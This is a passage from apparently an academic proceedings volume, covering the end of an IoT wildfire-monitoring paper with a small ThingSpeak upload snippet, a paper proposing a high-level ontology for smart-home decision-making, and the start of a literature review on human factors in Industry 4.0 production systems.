• IoT devices can be used to monitor the moisture content of the soil, the temperature of the air, the wind speed and direction, the amount of precipitation, and the amount of vegetation in the area. • IoT devices can also be used to monitor the behavior of firefighters; the location of firefighters can be tracked using GPS sensors. This data can be used to help officials plan and coordinate the response to a wildfire.


• IoT devices can also be used to predict the spread of a wildfire; data collected by IoT devices can be used to create a map of the area affected by the wildfire. This data can help officials plan and coordinate the response to a wildfire.

From the above, we can conclude that IoT devices have many potential uses for monitoring and predicting wildfires. The use of IoT devices is growing rapidly, and the technology is becoming more and more affordable. Officials should consider using IoT devices to help monitor and predict wildfires [40].
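As the dashboard example announced above, and purely for illustration rather than as the evaluated prototype, the following sketch pushes one reading to a ThingSpeak channel through its public HTTP update endpoint. The API key and field mapping are assumptions that would be replaced by the values of a real channel.

```python
import requests

THINGSPEAK_WRITE_KEY = "XXXXXXXXXXXXXXXX"   # placeholder write API key
UPDATE_URL = "https://api.thingspeak.com/update"

def push_to_dashboard(temp_c: float, humidity_pct: float, co_raw: int) -> bool:
    """Send one reading; fields 1-3 are an assumed channel layout."""
    params = {
        "api_key": THINGSPEAK_WRITE_KEY,
        "field1": temp_c,
        "field2": humidity_pct,
        "field3": co_raw,
    }
    response = requests.get(UPDATE_URL, params=params, timeout=10)
    # ThingSpeak returns the new entry id, or '0' if the update was rejected.
    return response.ok and response.text.strip() != "0"

if __name__ == "__main__":
    print("update accepted:", push_to_dashboard(27.4, 41.0, 512))
```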

6 Conclusion

Generally, the majority of forest fires are detected after they have burnt large sections of land and caused considerable property damage, agricultural loss, resource depletion, and harm to animals, as well as human injury or death. Several experts believe that the blazing summer heat is facilitating the spread of fires. A variety of sensors, including temperature and humidity sensors, could be used to better anticipate wildfires and mitigate their effects. We proposed an IoT-based approach to identify and monitor wildfires, and we validated it through a small prototype. According to the findings of the study, our approach has the potential to be deployed for detecting a forest fire and determining its location. The IoT strategy may be applied broadly in forests across the world to assist firefighting authorities in dealing with catastrophes more efficiently, thereby protecting lives and property. IoT-based wildfire detection and monitoring nevertheless has limitations. First, the approach relies heavily on sensors and other technology installed in advance, which limits its effectiveness in remote or hard-to-reach areas. Second, installing and maintaining the necessary infrastructure can be prohibitively expensive, especially for smaller forest services. Finally, the accuracy of the sensor data is often affected by weather and terrain. To address these limitations, our future work will concentrate on developing more effective and affordable sensors and related technology for detecting and responding to wildfires. Furthermore, efforts will be made to improve the accuracy of the data collected by IoT-based systems in order to make them more reliable and trustworthy.

References 1. World Health Organization Wildfires. https://www.who.int/health-topics/wildfires. Accessed 3 Oct 2020 2. Turkey wildfires: “The animals are on fire,” say devastated farmers as wildfires sweep Turkey - CNN. https://edition.cnn.com/2021/07/31/world/turkey-wildfires-manavgat-six-dead-intl/ index.html. Accessed 3 Aug 2021 3. Alkhatib, A.A.A.: A Review on Forest Fire Detection Techniques (2014). https://doi.org/10. 1155/2014/597368 4. Kumar, A., Gaur, A., Singh, A., et al.: Fire sensing technologies: a review. IEEE Sens J 19, 3191–3202 (2019). https://doi.org/10.1109/JSEN.2019.2894665 5. Gaur, A., Singh, A., Kumar, A., Kumar, A., Kapoor, K.: Video flame and smoke based fire detection algorithms: a literature review. Fire Technol. 56(5), 1943–1980 (2020). https://doi. org/10.1007/s10694-020-00986-y


6. Bu, F., Gharajeh, M.S.: Intelligent and vision-based fire detection systems: a survey. Image Vis. Comput. 91, 103803 (2019). https://doi.org/10.1016/J.IMAVIS.2019.08.007 7. Yuan, C., Zhang, Y., Liu, Z.: A survey on technologies for automatic forest fire monitoring, detection, and fighting using unmanned aerial vehicles and remote sensing techniques. 45, 783–792 (2015). https://doi.org/10.1139/CJFR-2014-0347 8. Allison, R.S., Johnston, J.M., Craig, G., Jennings, S.: Airborne optical and thermal remote sensing for wildfire detection and monitoring. Sensors 16, 1310 (2016) . https://doi.org/10. 3390/S16081310 9. Idrissi, I., Azizi, M., Moussaoui, O.: IoT security with Deep Learning-based Intrusion Detection Systems: A systematic literature review. In: 4th International Conference on Intelligent Computing in Data Sciences, ICDS 2020. Institute of Electrical and Electronics Engineers (IEEE), pp. 1–10 (2020) 10. Berrahal, M., Azizi, M.: Augmented binary multi-labeled CNN for practical facial attribute classification. Indones J. Electr. Eng. Comput. Sci. 23, 973–979 (2021) 11. Idrissi, I., Azizi, M., Moussaoui, O.: Accelerating the update of a DL-based IDS for IoT using deep transfer learning. Indones J Electr Eng Comput Sci 23, 1059–1067 (2021). https://doi. org/10.11591/ijeecs.v23.i2.pp1059-1067 12. Hammoudi, Y., Idrissi, I., Boukabous, M., et al.: Review on maintenance of photovoltaic systems based on deep learning and internet of things. Indones J. Electr. Eng. Comput. Sci. 26 (2022) 13. Boukabous, M., Azizi, M.: Review of learning-based techniques of sentiment analysis for security purposes. In: Innovations in Smart Cities Applications vol. 4, pp 96–109. Springer, Cham (2021) 14. Boukabous, M., Azizi, M.: A comparative study of deep learning based language representation learning models. Indones J. Electr. Eng. Comput. Sci. 22, 1032–1040 (2021). https:// doi.org/10.11591/ijeecs.v22.i2.pp1032-1040 15. DHT11 & DHT22 Sensors Temperature using Arduino - Arduino Project Hub. https://cre ate.arduino.cc/projecthub/MinukaThesathYapa/dht11-dht22-sensors-temperature-using-ard uino-b7a8d6. Accessed 21 Dec 2021 16. Uiversitatis A, Series C-T: How To Use The DHT22 Sensor For Measuring Temperature And Humidity With The Arduino Board. LXVIII (2016). https://doi.org/10.1515/aucts-2016-0005 17. Ferdousi, J.A., Ananto, S.E., Ahmed, M.N.: Development of Carbon Monoxide detecting device using MQ-7 sensor along with its statistical analysis (2014) 18. Haxhibeqiri, J., De Poorter, E., Moerman, I., Hoebeke, J.: A survey of LoRaWAN for IoT: from technology to application. Sensors 2018 18, 3995 (2018). https://doi.org/10.3390/S18 113995 19. Idrissi, I., Mostafa Azizi, M., Moussaoui, O.: A lightweight optimized deep learning-based host-intrusion detection system deployed on the edge for IoT. Int. J. Comput. Digit. Syst. 11, 209–216 (2022). https://doi.org/10.12785/ijcds/110117 20. MQTT - The Standard for IoT Messaging. https://mqtt.org/. Accessed 12 Aug 2021 21. Soni, D., Makwana, A.: A Survey On MQTT: A Protocol Of Internet Of ThinGS (IOT) MPIndex View project Analysis and Survey on String Matching Algorithms for Ontology Matching View project A SURVEY ON MQTT: A PROTOCOL OF INTERNET OF THINGS(IOT) (2017) 22. System, N.M.: Real-Time Identification of Smoldering and Flaming Combustion Phases in Forest Using a Wireless Sensor. (2016). https://doi.org/10.3390/s16081228 23. Pokhrel, P., B HS: Advancing Early Forest Fire Detection Utilizing Smart Wireless Sensor Networks. Springer International Publishing (2018) 24. 
Zope, V., Dadlani, T., Matai, A., et al.: IoT sensor and deep neural network based wildfire prediction system. In: Proceedings of the International Conference on Intelligent Computing and Control Systems, ICICCS 2020, pp 205–208 (2020)


25. Dampage, U., Bandaranayake, L., Wanasinghe, R., Kottahachchi, K.: Forest fire detection system using wireless sensor networks and machine learning. Sci. Rep., 1–11 (2022). https:// doi.org/10.1038/s41598-021-03882-9 26. Mani, G., Volety, R.: A comparative analysis of LSTM and ARIMA for enhanced real-time air pollutant levels forecasting using sensor fusion with ground station data. Cogent Eng. 8 (2021). https://doi.org/10.1080/23311916.2021.1936886 27. Liew, J.T., Sali, A., Noordin, N.K., et al.: Sustainable Peatland Management with IoT and Data Analytics (2021) 28. Imran, I.N., Ahmad, S., Kim, D.H.: Towards mountain fire safety using fire spread predictive analytics and mountain fire containment in iot environment. Sustain 13, 1–23 (2021). https:// doi.org/10.3390/su13052461 29. Patil, S.S., Vidyavathi, B.M.: A machine learning approach to weather prediction in wireless sensor networks. Int. J. Adv. Comput. Sci. Appl. 13, 254–259 (2022). https://doi.org/10. 14569/IJACSA.2022.0130131 30. Zhang, T.: Faulty Sensor Data Detection in Wireless Sensor Networks Using Logistical Regression. (2017). https://doi.org/10.1109/ICDCSW.2017.37 31. Patel, Y.S., Banerjee, S., Misra, R., Das, S.K.: Low-latency energy-efficient cyber-physical disaster system using edge deep learning. In: PervasiveHealth: Pervasive Computing Technologies for Healthcare (2020) 32. Garg, S., Ahuja, S., Randhawa, S.: Real time adaptive street lighting system (2020) 33. Negara, B.S., Kurniawan, R., Nazri, M.Z.A., et al.: Riau forest fire prediction using supervised machine learning. J. Phys. Conf. Ser. (2020) 34. Sharma, R., Rani, S., Memon, I.: A smart approach for fire prediction under uncertain conditions using machine learning. Multimed. Tools Appl. 79(37–38), 28155–28168 (2020). https://doi.org/10.1007/s11042-020-09347-x 35. Idrissi, I., Boukabous, M., Azizi, M., et al.: Toward a deep learning-based intrusion detection system for IoT against botnet attacks. IAES Int. J. Artif. Intell. 10, 110–120 (2021). https:// doi.org/10.11591/ijai.v10.i1.pp110-120 36. Idrissi, I., Azizi, M., Moussaoui, O.: A stratified IoT deep learning based intrusion detection system. In: 2022 2nd International Conference on Innovative Research in Applied Science, Engineering and Technology (IRASET). IEEE, pp. 1–8 (2022) 37. IoT Analytics - ThingSpeak Internet of Things. https://thingspeak.com/. Accessed 21 Dec 2021 38. ThingsBoard - Open-source IoT Platform. https://thingsboard.io/. Accessed 14 Aug 2021 39. Node-RED. https://nodered.org/. Accessed 21 Dec 2021 40. Yandouzi, M., Grari, M., Idrissi, I., et al.: Literature review on forest fires detection and prediction using deep learning and drones. J. Theor. Appl. Inf. Technol. (2022)

A Decision-Making Model Based on a High-Level Ontology in Context of a Smart Home Mohamed El Hamdouni(B) , Yasser Mesmoudi, and Abderrahim Tahiri National School of Applied Sciences of Tetouan, Tetouan, Morocco [email protected], {ymesmoudi,t.abderrahim}@uae.ac.ma

Abstract. The Smart Home is a residence equipped with computer technology that assists its inhabitants in the various situations of domestic life by trying to optimally manage their comfort and safety through actions on the house. The detection of abnormal situations is one of the essential points of a home monitoring system. These situations can be detected by analyzing the primitives generated by the audio processing stages and by the apartment's sensors. In this paper we propose an inference and decision-making model based on a high-level ontology. Keywords: Decision · Ontology · Smart Home

1 Introduction

A Smart Home is a residence equipped with computer technology that assists its inhabitants in the various situations of domestic life by trying to manage their comfort and safety optimally through actions on the house. Detection of abnormal situations is one of the essential points of a home monitoring system. These situations can be detected by analyzing the primitives generated by the audio processing and by the sensors of the apartment. For example, the detection of screams and dull noises (the fall of a heavy object) within a short time interval makes it possible to infer that a fall has occurred. Some knowledge about the apartment and the inhabitant can be specified with an ontology, i.e., a formal representation of knowledge through the concepts belonging to a field and the relationships between them; instances of these concepts can also be specified to make inferences about domain properties. The main advantages of an ontology are a standard vocabulary for describing the field and the ease of modifying its content when necessary. Among the knowledge that can be specified, we can mention, for example, the location of rooms in the apartment, the location of sensors, and the features of the person (age, impairments, preferences). An ontology can also be used to abstract information into logical elements that are used for context recognition. In this article we describe the state of the art of pre-existing ontologies and we propose a high-level ontology.



2 Ontology Context and Smart Home

McCarthy (1993) presents context as a set of abstract mathematical entities with properties useful for the logical applications of artificial intelligence. However, the term context is used in computer science with a meaning that may vary depending on the field of application. For example, in Natural Language Processing (NLP), the notion of context is different from that used in the field of human-machine interfaces. In addition, it should be noted that not only is there a definition specific to each domain, but it is also possible to find more than one definition of context for the same domain. Nevertheless, we can say that, in any case, context is associated with the interpretation of an entity and its meaning; for example, regarding the interpretation of a word in NLP, a word can have several meanings, and its interpretation depends on the context (given by the sentence) in which it appears. In ambient intelligence, context was initially limited to specific information such as location (Schilit et al., 1994; Brown et al., 1997). Then other elements were added, such as orientation, the user's emotional state, and the date (Dey, 1998). On the other hand, simply defining the context as a list of information is too restrictive, because there are circumstances where the elements in play might not belong to this definition. The definition that seems most relevant to us in the state of the art is the one given by Dey (2001): context is any information that can be used to characterize the situation of an entity, where an entity can be a person, place, or object that is considered relevant to the interaction between the user and the application. We find this definition more general and better suited to our research. Indeed, context is always associated with a situation in which it is necessary to reduce ambiguity, and context is only useful when a situation may have several interpretations. In addition, the context does not contain all the information available to the system, but only the subset that is useful for disambiguation. The information composing the context is not the same in all cases; it changes as the situation evolves. Thus, for example, time could be the most important element of context in one situation and be completely insignificant in another. However, Abowd et al. (1999) and Ryan et al. (1997) identified the most important elements for characterizing the situation of an entity as time, location, activity, and the identity of the person. These elements relate to the essential aspects of context described by Schilit and Theimer (1994): "Where are you?", "Who are you with?", and "What resources do you have?". In addition, an application that uses context needs to know when and what (what the person is doing) in order to determine why a situation occurred. In this research work, we use the same elements to compose the context, except for the identity of the person, which is not important since we assume the presence of a single person in the environment. However, the importance of each element of context will depend on the situation to be assessed.

3 Related Work

Chen et al. propose COBRA-ONT for smart spaces. They describe places using two kinds of places with different constraints. There are also agents, such as humans and software, which are located in places and play certain roles to perform some activities.


An important contribution is the broker architecture proposed by the authors, which can be used to acquire and reason over contextual information from mobile devices in order to reduce the burden on developers. Since, in IoT applications, the concept of a location may vary from a point to a place of interest, COBRA-ONT is one of the most promising ontologies for representing the location context of "things": it can not only describe a point but can also be used to specify a place using a 'string' value for a location. To further correlate contextual information with location, Kim et al. propose an ontology based on the information provided by mobile device sensors, both physical (WiFi, Bluetooth, etc.) and virtual (e.g., user schedule, web logs, etc.), to support context-aware services. The proposed ontology defines the relations between different user locations and the identified contexts. The authors further propose a reasoner on top of this ontology and evaluate its ability to identify locations. The results show that their reasoner achieves higher location accuracy than GPS. Several domain-specific ontologies have been proposed for defining contextual information, as the contexts inferred from sensor data may vary largely depending on the domain. For example, in a university domain, the activities may be limited to only a small subset such as reading, playing, or sleeping, while in a smart home a larger set of activities (cooking, cleaning, reading, sleeping, etc.) may be encompassed. In this section, we limit our study to context-aware ontologies in the domain of smart homes and activity recognition. Smart-home technologies are now being developed to assist disabled and elderly individuals in living with dignity. Okeyo et al. propose an ontology to semantically label Activities of Daily Living (ADL), such as cooking food or brushing teeth, for the smart-home domain. Their ontology is based on dynamic segmentation of sensor data over variable time windows to identify simple user activities.

4 Proposed Model


*Rules. In the process of context inference and decision-making, it is important to be able to include explicit knowledge beyond the knowledge obtained by machine learning, for example, logical rules describing that if the person has been in the kitchen for a few minutes and in the meantime has turned on the oven and opened the fridge, then the current activity is "cooking". If a statistical logic programming method is applied, such a rule base may have a numerical weight associated with each rule to model uncertainty; this value then represents the probability that the rule is true in the real world. The rules in this module are mainly used to specify situations of interest and the actions that must be executed when they are recognized.

*Decision. This component takes as input the output of the ontology to decide whether or not to act, and which action to take. This eventually results in the next module sending commands to the controller layer connected to the things in the apartment: turn on the light, turn off the oven, make an emergency call. Ambient assistance systems that do not use ontologies are, for the most part, based on rules to provide the necessary intelligence for the habitat. Concretely, these systems use first-order predicate logic to find the constraints to satisfy. Each constraint, in the form of a scheduled program (script), listens to the inputs and outputs, retrieves the value or the posted data, and then propagates it to all of its rules to check which ones are satisfied. To understand this fully, let us take the following example. The smart home wants to illuminate the hallway when the elderly person gets up during the night. If the motion sensor of the bedroom indicates "ON", a rule is triggered to turn on the lights of the room as soon as a movement is detected. To be useful, this rule adds temporal information so that it runs only after 6 p.m. Despite this, the rule remains very limited, in the sense that it knows nothing about the context in which it runs. The rule system has no knowledge of the sensor history, which makes it impossible to establish very precise rules. In addition, no information is given on the interactions between existing rules: do they conflict? Do they cancel each other out? The lack of information on the other entities involved in the process makes the rule neither robust nor able to manage temporal and spatial information. An example of the information used in a smart home is the state value of a bedroom motion sensor. The value "ON" only makes sense if we associate it with the device and the place in which it was captured. This information is then represented, encapsulated with other information such as the time, and merged to give rise to a piece of knowledge. Example: the motion sensor of the room located above the bed gives "ON" at 22 h 25 min. This knowledge is associated with another piece of knowledge: every evening around 8 p.m. the person lies on their bed to fall asleep. On the basis of this knowledge, inference allows us to say that the person is on their bed, probably sleeping. A hedged sketch of such a rule is given below.
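As an illustration of the kind of rule discussed above, and not the authors' implementation, the following sketch encodes the "cooking" and "probably sleeping" inferences over time-stamped sensor events. The event names, time windows, and weights are assumptions.

```python
from datetime import datetime, timedelta

# Each event is a tuple (timestamp, source, value); names and windows are illustrative.
def infer_activity(events, now):
    """Return (activity, confidence) from recent events using weighted rules."""
    recent = [e for e in events if now - e[0] <= timedelta(minutes=10)]
    sources_on = {src for (_, src, val) in recent if val == "ON"}

    # Rule 1 (weight 0.9): kitchen presence + oven + fridge within 10 min -> cooking.
    if {"kitchen_presence", "oven", "fridge_door"} <= sources_on:
        return "cooking", 0.9

    # Rule 2 (weight 0.7): bed-area motion after 20:00 -> probably sleeping.
    if "bed_motion" in sources_on and now.hour >= 20:
        return "sleeping", 0.7

    return "unknown", 0.0

if __name__ == "__main__":
    now = datetime(2022, 5, 1, 22, 25)
    events = [(datetime(2022, 5, 1, 22, 24), "bed_motion", "ON")]
    print(infer_activity(events, now))   # -> ('sleeping', 0.7)
```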


To enable knowledge to be specified, expressed, represented, and shared between machines, humans, and any other entity, the W3C (World Wide Web Consortium) has defined a graph-oriented formalism based on XML standards.

*High-Level Ontology. The high-level ontology represents the concepts that are used at the reasoning level. These concepts are organized into the three parts listed below; a small illustrative sketch follows the list.

- Rules entity. These concepts relate to the elements used in inferences that do not correspond to physical objects, such as the Situation or Order concepts. In most cases, the instances of these concepts are the possible values resulting from an inference process. For example, cooking and sleeping are instances belonging to the Activity class.
- Physical entity. This groups together the classes that designate physical objects found in the physical space or the existing rooms. Unlike the low-level ontology, here we do not try to describe specific objects in the environment, but rather to list the objects existing in the apartment without being interested in specific properties such as their location or identifiers. For example, an instance of the Object class is simply a door, without specifying which real object in the space it refers to.
- Event entity. These instances in the high-level ontology are produced by the inference modules (e.g., location, activity, and situation) after processing the information from the sensors (which has previously been stored in the low-level ontology).
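Purely as an illustration of this three-part organization, and not the authors' formal ontology (which would normally be expressed in an RDF/OWL formalism), a Python sketch of the concept layers could look as follows; the class and instance names are assumptions.

```python
from dataclasses import dataclass, field
from typing import List

# Rules entity: possible values produced by inference.
ACTIVITIES = {"cooking", "sleeping", "resting"}      # instances of the Activity class
SITUATIONS = {"normal", "distress"}                  # instances of the Situation class

# Physical entity: generic objects of the apartment, without location or identifier.
@dataclass
class PhysicalObject:
    kind: str                                        # e.g. "door", "oven", "bed"

# Event entity: instances produced by the inference modules.
@dataclass
class InferredEvent:
    module: str                                      # "location", "activity", "situation"
    value: str
    timestamp: str

@dataclass
class HighLevelOntology:
    objects: List[PhysicalObject] = field(default_factory=list)
    events: List[InferredEvent] = field(default_factory=list)

    def add_event(self, module: str, value: str, timestamp: str):
        # Only admit values known to the Rules entity (locations are free-form here).
        assert module == "location" or value in ACTIVITIES | SITUATIONS
        self.events.append(InferredEvent(module, value, timestamp))

onto = HighLevelOntology(objects=[PhysicalObject("door"), PhysicalObject("oven")])
onto.add_event("activity", "sleeping", "2022-05-01T22:25")
```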

5 Conclusion

The complete definition of the ontology and the division of the representation model into two semantic layers is a particularly useful approach for adapting the system to new intelligent environments. The knowledge is not limited to describing the physical elements of the smart home; it also contains abstract elements and the relationships existing between the different concepts of the domain. The extension of the knowledge model through the inclusion of logical rules has shown its relevance for the representation of situations of risk or distress.

References

Guan Shen: Modeling and reasoning of IoT architecture in semantic ontology dimension. Computer Communications (2020)
Elsaleh, T., et al.: IoT-Stream: a lightweight ontology for Internet of Things data streams and its use with data analytics and event detection services. Sensors (2020)
Bajaj, G., Agarwal, R., Singh, P., Georgantas, N., Issarny, V.: A study of existing ontologies in the IoT-domain (2017)
Szilagyi, I., Wira, P.: Ontologies and Semantic Web for the Internet of Things - a survey (2016)
Bae, I.-H.: An ontology-based approach to ADL recognition in smart homes. Futur. Gener. Comput. Syst. 33, 32–41 (2014)
Hirmer, P., Wieland, M., Breitenbücher, U., Mitschang, B.: Dynamic ontology-based sensor binding. In: Pokorný, J., Ivanović, M., Thalheim, B., Saloun, P. (eds.) Advances in Databases and Information Systems: 20th East European Conference, ADBIS 2016, LNCS, vol. 9809, pp. 323–337. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-44039-2_22


Daniele, L., den Hartog, F., Roes, J.: Study on Semantic Assets for Smart Appliances Interoperability (2015)
Compton, M., et al.: The SSN ontology of the W3C Semantic Sensor Network Incubator Group. Web Semantics: Science, Services and Agents on the World Wide Web
Poveda-Villalón, M., Gómez-Pérez, A., Suárez-Figueroa, M.C.: OOPS! (OntOlogy Pitfall Scanner!): an on-line tool for ontology evaluation. Int. J. Semantic Web Inf. Syst. 10(2), 7–34 (2014)
Brank, J., Grobelnik, M., Mladenic, D.: A survey of ontology evaluation techniques. In: Proceedings of the Conference on Data Mining and Data Warehouses (SiKDD 2005), pp. 166–170 (2005)
Vrandečić, D.: Ontology evaluation. In: Handbook on Ontologies, pp. 293–313. Springer (2009)
Desai, P., Sheth, A., Anantharam, P.: Semantic gateway as a service architecture for IoT interoperability. In: 2015 IEEE International Conference on Mobile Services (MS), pp. 313–319. IEEE (2015)
Lécué, F., et al.: Star-city: semantic traffic analytics and reasoning for city. In: Proceedings of the 19th International Conference on Intelligent User Interfaces, pp. 179–188. ACM (2014)
Kazmi, A., Jan, Z., Zappa, A., Serrano, M.: Overcoming the heterogeneity in the Internet of Things for smart cities. In: International Workshop on Interoperability and Open-Source Solutions, pp. 20–35. Springer (2016)
van der Schaaf, H., Herzog, R.: Mapping the OGC SensorThings API onto the OpenIoT middleware. In: Podnar Žarko, I., Pripužić, K., Serrano, M. (eds.) Interoperability and Open-Source Solutions for the Internet of Things: International Workshop, FP7 OpenIoT Project, Held in Conjunction with SoftCOM 2014, pp. 62–70. Springer International Publishing, Croatia (2014). https://doi.org/10.1007/978-3-319-56877-5_2
Seydoux, N., Drira, K., Hernandez, N., Monteil, T.: IoT-O, a core-domain IoT ontology to represent connected devices networks. In: Blomqvist, E., Ciancarini, P., Poggi, F., Vitali, F. (eds.) Knowledge Engineering and Knowledge Management. EKAW 2016. Lecture Notes in Computer Science, vol. 10024, pp. 561–576 (2016)
Agarwal, R., et al.: Unified IoT ontology to enable interoperability and federation of testbeds. In: 3rd IEEE World Forum on Internet of Things, pp. 70–75 (2016)
oneM2M: TS-0012 oneM2M Base Ontology. Technical report (2016)
Willner, A., et al.: The open-multinet upper ontology towards the semantic based management of federated infrastructures. In: 10th EAI International Conference on Testbeds and Research Infrastructures for the Development of Networks & Communities (TRIDENTCOM), p. 10. ACM, Vancouver, Canada (2015)
Hachem, S., Teixeira, T., Issarny, V.: Ontologies for the Internet of Things. In: Proceedings of the 8th Middleware Doctoral Symposium, pp. 3:1–3:6. ACM (2011)
Bauer, M., et al.: IoT reference model. In: Enabling Things to Talk: Designing IoT Solutions with the IoT Architectural Reference Model, pp. 113–162. Springer (2013). https://doi.org/10.1007/978-3-642-40403-0_7
Bassi, A., et al.: IoT reference architecture. In: Enabling Things to Talk: Designing IoT Solutions with the IoT Architectural Reference Model, pp. 163–211. Springer (2013)
Suárez-Figueroa, M.C.: NeOn Methodology for Building Ontology Networks: Specification, Scheduling and Reuse. Ph.D. thesis, UPM (2010)
Gyrard, A., Serrano, M., Atemezing, G.A.: Semantic web methodologies, best practices and ontology engineering applied to Internet of Things. In: 2015 IEEE 2nd World Forum on Internet of Things (WF-IoT), pp. 412–417. IEEE (2015)

Integration of the Human Factor in the Management and Improvement of Performance of Production Systems: An Exploratory Literature Review Saloua Farouq(B) , Reda Tajini, and Aziz Soulhi Systems Management & Engineering Team - MIS Engineering Systems and Digital Transformation Laboratory - LISTD Computer Science Department, Mines-Rabat School (ENSMR), Rabat, Morocco {saloua.farouq,tajini,soulhi}@enim.ac.ma

Abstract. Driven by the emergence of new technologies, Industry 4.0, known as the fourth industrial revolution, has been a challenge for all industries since the term first appeared in 2011, ushering in a generation of connected, robotic, and intelligent factories. With the digital revolution, the boundaries between the physical and digital worlds are fading, giving life to an interconnected 4.0 factory in which employees, machines, and products interact. Although we observe an increasing trend towards automating work in almost every industry, the human factor still plays a central role in many activities of production systems. However, many of the planning models developed for managerial decision support do not consider the human factor and its impact on system performance, leading to inaccurate planning results and decisions, underperforming systems, and increased health hazards for employees. Many studies have shown that the human factor directly impacts the performance of production systems in different domains, depending on the operator's attitude, physical condition, mental health, etc. For that reason, the human factor must be integrated into the analysis of production system performance to ensure good effectiveness and productivity. The purpose of this paper is to present a literature review of the new production systems of Industry 4.0 and the place taken by the human factor in improving the performance of these systems. Keywords: Production systems · Human Factor · Industry 4.0 · Internet of Things · Cloud computing · Performance · 3D printing · Digitalisation · Efficiency

1 Introduction

The term Industry 4.0 [1] stands for the fourth industrial revolution, which is defined as a new level of organisation and control over the entire value chain of the product life cycle; it is geared towards increasingly individualised, complex, automated, and sustainable production, so that people can operate machines simply, efficiently, and persistently [2]. The main engine of this revolution is the Internet. The realisation of the intelligent factory relies on real-time communication to monitor and act on the company's activities. The systems communicate and cooperate with each other, with humans, products, and machines, and the Internet connects all the objects of the plant: employees, machines, products, customers, suppliers, and systems [3]. To ensure this communication, the revolution is based on including automation technologies in manufacturing systems, such as the Internet of Things (IoT) [9, 12], cloud computing [9, 12] and analytics, as well as artificial intelligence and machine learning, in production facilities and across operations. The purpose of moving from mechanical, electrical, and automated processes to automated systems based on these technologies is to ensure good productivity and efficiency with as little waste as possible. Despite the opportunities that the automation of production systems offers, many companies still rely on the human factor in several areas because of its flexibility and the cognitive and motor skills that machines cannot yet imitate economically [2]. Thus, people may behave in non-specified and non-predicted ways which are in fact beneficial to system performance [4]. By contrast, in some cases these operators are seen as a source of unpredictability causing errors and hazardous situations [5]; according to Azadeh & Zarrin (2016), human factors are the cause of at least 66% of accidents and more than 90% of incidents, not only in the maritime sector but also in other industries [6]. As most human factor experts know, a golden principle says that it is important to come in early in a design project [7]. Consequently, it is extremely beneficial to include the human component in the equation of the shift towards smart manufacturing [3]. Knowing the impact of the human factor on the performance of production systems means involving it from the initial phase of system design. As long as it has a perceptible impact on performance, it must be ensured that, in each phase, the human being is taken into consideration with its positive and negative sides, in order to estimate the efficiency of the system and to react correctly as soon as possible in case of an abnormal situation. To highlight this issue, many studies have been carried out in different fields of activity dealing with the human factor and its impact on system performance. In this paper, we first review what has been said about the fourth industrial revolution and the technologies it relies on, then the human factor, its impacts, and the domains in which it has been studied the most, and finally the challenges of integrating the human factor into Industry 4.0.

2 Industry 4.0: Overview from History

The concept of Industry 4.0 [12] originates from Germany and was first introduced in 2011. Industry 4.0 can be located within a larger industrial revolution framework. The first industrial revolution dates back to the 1800s, when mechanisation and the utilisation


of mechanical power revolutionised industrial work. Electrification set the premises for the second industrial revolution and mass production. The third industrial revolution took place in the 1970s, when digitalisation arrived with the introduction of microelectronics and automation. The fourth industrial revolution has been triggered by the development of information and communications technologies and rapid technological progress [8]. The figure below summarises the evolution of industry over time (Fig. 1):

Fig. 1. Steps of four industrial Revolutions [2]

This fourth revolution is based on the integration of different technologies in order to achieve increased automation, predictive maintenance, self-optimising process improvements and, most importantly, a new level of efficiency and responsiveness to customers that was previously hard to reach. These technologies differ from one field to another. Experts believe digitisation and the emergence of labour-saving technologies (e.g., intelligent robots, autonomous vehicles, and cloud solutions) will eliminate the majority of lower-skilled jobs while creating countless job opportunities in various areas such as automation engineering, control system design, machine learning, and software engineering [9]. What follows does not cover all these technologies; an overview of some of them nevertheless seems essential.

2.1 Web and Mobile Applications

Web and mobile applications have multiplied since the early 2000s. Nowadays, smartphone and tablet applications are the most used. Indeed, they facilitate exchanges within companies between internal and external collaborators. New web and mobile technologies, thanks to interconnected systems, facilitate the transfer of data and its rapid and intelligent processing.

2.2 3D Printing

Also called "additive manufacturing" [3, 9, 12], 3D printing makes it possible to manufacture components, unique ones if necessary, in record time. It thus frees production from traditional processes and gives Industry 4.0 new flexibility and speed. It is used in particular in aeronautics for the manufacture of certain complex parts, and in all sectors for prototyping.


2.3 Internet of Things (IoT)

The Internet of Things (IoT) [3, 9, 12] is a defining element of smart factories. Machines in the factory are equipped with sensors that have an IP address that allows them to connect to other web-enabled devices. This mechanisation and connectivity make it possible to collect, analyse and exchange large volumes of valuable data.

2.4 Cloud Computing

Cloud computing [3, 9, 12] is the cornerstone of any Industry 4.0 strategy. Full-fledged realisation of smart manufacturing requires connectivity and integration of engineering, supply chain, production, sales and distribution, and service. All of this is possible with the cloud. In addition, the usually large volume of stored and analysed data can be processed more efficiently and cost-effectively through the cloud. Cloud computing can also reduce start-up costs for small and medium-sized businesses that can adapt their needs and scale as they grow.

3 Human Factors The human factor can be defined as the human contribution involved in an event. It includes behaviours, abilities, and individual characteristics (interpersonal skills, communication, fatigue, etc.). HF has been, arguably, a blind spot in engineering education and practice. Nevertheless, every engineering design engages people in some way throughout its lifecycle. Someone has to assemble the design, use the design, maintain the design, and dismantle and recycle the design at the end of its life-cycle; with humans intimately engaged in the engineered system lifecycle, it should not be surprising that the HF in the design of the system affects ultimate system performance [2].

4 Literature Review To explore the literature treating 'Industry 4.0' and the 'human factor', we use ScienceDirect as a database, formulating the requests below. Among the 40 papers read in relation to the subject, and using the two tools employed in this literature review, Zotero and Nvivo, the figure below summarises the number of selected papers (33) per year (Fig. 2). Dividing the papers read by typology, we obtain the results in the graph below (Fig. 3). The authors of the papers listed below used keywords in relation to the basic terms of our subject; we can summarise those keywords in a word cloud that shows the occurrence of each term in those papers. Below is the representation of this word cloud (Fig. 4). The word cloud shows the topics that were treated by the authors, from the most frequent terms in the middle (system, human factor, design, etc.) to the least mentioned (transport, health, etc.).

Table 1. Requests for research

N°   Key word                                                             Request
1    Human factor                                                         1
2    Industry 4.0                                                         2
3    The impact of human factor                                           3
4    Performance of production system 4.0                                 4
5    Morocco                                                              5
6    Human factor in the industry 4.0                                     "1" AND "2"
7    The impact of the human factor in the industry 4.0                   "3" AND "2"
8    The impact of human factor in the performance of the production
     system 4.0 in Morocco                                                "3" AND "4" AND "5"

Fig. 2. The number of selected papers per year

Fig. 3. Repartition of selected papers per typology


Fig. 4. Word cloud

Based on the generated database of selected papers, we can separate them into three categories: papers that treated only the human factor, papers that treated essentially Industry 4.0, and finally papers that treated both. Below is the result of this separation (Fig. 5):

